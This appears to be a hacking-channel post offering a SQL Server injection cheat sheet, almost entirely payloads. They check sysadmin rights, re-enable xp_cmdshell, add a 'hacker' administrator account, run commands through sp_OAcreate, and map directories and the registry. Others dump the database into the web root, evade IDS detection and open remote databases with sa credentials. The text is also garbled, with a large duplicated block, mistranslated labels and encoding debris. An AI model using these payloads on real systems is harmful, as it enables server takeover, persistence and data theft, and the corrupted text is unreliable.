cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
Use XP_REGREAD to read with PUBLIC permission:
;exec master.dbo.xp_regread
hkey_local_machine,
'system\currentcontrolset\services\ w3svc\parameters\virtual roots\'
'/'
Advanced technology under SQLSERVER can refer to the fifth chapter of Script Hacker by Zeng Yunhao.
3. DSqlHelper
detects authority SYSADMIN:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, db_owner.
Check XP_CMDSHELL (CMD command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_cmdshell')
Check XP_REGREAD (registry read function):
and 1=(SELECT count(*) FROM master .dbo.sysobjects WHERE name='xp_regread')
check SP_MAKEWEBTASK (backup function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_makewebtask')
check SP_ADDEXTENDEDPROC:
and 1=(SELECT count( *) FROM master.dbo.sysobjects WHERE name ='sp_addextendedproc')
detect XP_SUBDIRS read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_subdirs')
Check XP_DIRTREE read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_dirtree')
content:
; the UPDATE table set field contents = =. 1. 1 WHERE
XP_CMDSHELL detection:
; Exec master..xp_cmdshell 'the dir C: \'
repair XP_CMDSHELL:
; Exec master.dbo.sp_addextendedproc 'the xp_cmdshell', 'Xplog70.dll'
with XP_CMDSHELL add user hacker:
;exec master.dbo.xp_cmdshell'net user hacker 123456 /add'
XP_CMDSHELL add user hacker to ADMIN group:
;exec master.dbo.xp_cmdshell'net localgroup administrators hacker /add'
Create table test:
;create table [dbo].[test] ([dstr][char](255));
test table segment test:
and exists (select * from test)
Read the location of WEB (read the registry):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into test (dstr) values(@result);-
the absolute path of WEB burst (error mode):
and 1=(select count(*) from test where dstr> 1)
delete table test:
;drop table test ;
βCreate table dirs for viewing directories:
;create table dirs(paths varchar(100), id int)
Add the contents of the viewing directories to table dirs:
;insert dirs exec master.dbo.xp_dirtree'c:\'
explode the contents of the directory dirs:
and 0<>(select top 1 paths from dirs)
Backup database DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:\inetpub\wwwroot\down.bak' ;
βDrop table dirs:
;drop table dirs;βCreate
table temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));β
Add the drive list to the temp table:
;insert temp exec master.dbo.xp_availablemedia;β
Delete table temp:
;delete from temp;
βcreate table dirs:
;create table dirs(paths varchar(100), id int);β
get subdirectory list XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs'c:\' ;
βBroken content (error mode):
and 0<>(select top 1 paths from dirs)
delete table dirs:
;delete from dirs;
βcreate table dirs:
;create table dirs(paths varchar(100), id int )
-Use XP_CMDSHELL to view the contents of the directory:
;insert dirs exec master..xp_cmdshell'dir c:\'
delete table dirs:
;delete from dirs;
-check SP_OAcreate (execute command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
SP_OAcreate executes CMD command:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run ',null,'C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add'
SP_OAcreate creates a directory:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,' run',null,'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'
Create a virtual directory E disk:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default Web site" -v "e","e:\"'
Set virtual directory E to Readable:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' to
'system\currentcontrolset\services\ w3svc\parameters\virtual roots\'
'/'
Advanced technology under SQLSERVER can refer to the fifth chapter of Script Hacker by Zeng Yunhao.
3. DSqlHelper
detects authority SYSADMIN:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, db_owner.
Check XP_CMDSHELL (CMD command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_cmdshell')
Check XP_REGREAD (registry read function):
and 1=(SELECT count(*) FROM master .dbo.sysobjects WHERE name='xp_regread')
check SP_MAKEWEBTASK (backup function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_makewebtask')
check SP_ADDEXTENDEDPROC:
and 1=(SELECT count( *) FROM master.dbo.sysobjects WHERE name ='sp_addextendedproc')
detect XP_SUBDIRS read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_subdirs')
Check XP_DIRTREE read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_dirtree')
content:
; the UPDATE table set field contents = =. 1. 1 WHERE
XP_CMDSHELL detection:
; Exec master..xp_cmdshell 'the dir C: \'
repair XP_CMDSHELL:
; Exec master.dbo.sp_addextendedproc 'the xp_cmdshell', 'Xplog70.dll'
with XP_CMDSHELL add user hacker:
;exec master.dbo.xp_cmdshell'net user hacker 123456 /add'
XP_CMDSHELL add user hacker to ADMIN group:
;exec master.dbo.xp_cmdshell'net localgroup administrators hacker /add'
Create table test:
;create table [dbo].[test] ([dstr][char](255));
test table segment test:
and exists (select * from test)
Read the location of WEB (read the registry):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into test (dstr) values(@result);-
the absolute path of WEB burst (error mode):
and 1=(select count(*) from test where dstr> 1)
delete table test:
;drop table test ;
βCreate table dirs for viewing directories:
;create table dirs(paths varchar(100), id int)
Add the contents of the viewing directories to table dirs:
;insert dirs exec master.dbo.xp_dirtree'c:\'
explode the contents of the directory dirs:
and 0<>(select top 1 paths from dirs)
Backup database DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:\inetpub\wwwroot\down.bak' ;
βDrop table dirs:
;drop table dirs;βCreate
table temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));β
Add the drive list to the temp table:
;insert temp exec master.dbo.xp_availablemedia;β
Delete table temp:
;delete from temp;
βcreate table dirs:
;create table dirs(paths varchar(100), id int);β
get subdirectory list XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs'c:\' ;
βBroken content (error mode):
and 0<>(select top 1 paths from dirs)
delete table dirs:
;delete from dirs;
βcreate table dirs:
;create table dirs(paths varchar(100), id int )
-Use XP_CMDSHELL to view the contents of the directory:
;insert dirs exec master..xp_cmdshell'dir c:\'
delete table dirs:
;delete from dirs;
-check SP_OAcreate (execute command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
SP_OAcreate executes CMD command:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run ',null,'C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add'
SP_OAcreate creates a directory:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,' run',null,'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'
Create a virtual directory E disk:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default Web site" -v "e","e:\"'
Set virtual directory E to Readable:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' to
start SERVER service:
;exec master..xp_servicecontrol'start','server'
bypass IDS detection XP_CMDSHELL:
;declare @a sysname set @a='xp_'+'cmdshell' exec @ a'dir c:\ '
Open remote database 1
:; select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1' )
Open remote database 2:
;select * from OPENROWSET('SQLOLEDB ','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table'
ENJOY β€οΈπ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
;exec master..xp_servicecontrol'start','server'
bypass IDS detection XP_CMDSHELL:
;declare @a sysname set @a='xp_'+'cmdshell' exec @ a'dir c:\ '
Open remote database 1
:; select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1' )
Open remote database 2:
;select * from OPENROWSET('SQLOLEDB ','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table'
ENJOY β€οΈπ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β